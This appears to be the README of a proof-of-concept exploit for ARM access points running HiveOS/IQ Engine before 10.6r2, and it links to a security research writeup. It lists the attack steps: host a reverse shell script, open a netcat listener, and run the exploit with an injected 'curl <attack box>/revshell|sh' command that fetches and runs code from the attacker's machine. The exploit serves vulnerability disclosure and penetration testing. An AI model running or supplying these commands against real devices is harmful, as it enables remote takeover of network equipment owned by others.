PoC for ARM-based access points running HiveOS/IQ Engine <10.6r2.
- Edit
revshell
to point to your shell catcher IP/port - Host the reverse shell:
python3 -m http.server
- Open a shell catcher:
nc -lvnp 1337
- Run the POC (may take a few minutes):
python3 poc.py <ip of ap> "curl <ip of attack box>:8000/revshell|sh"
Writeup here: https://research.aurainfosec.io/pentest/bee-yond-capacity/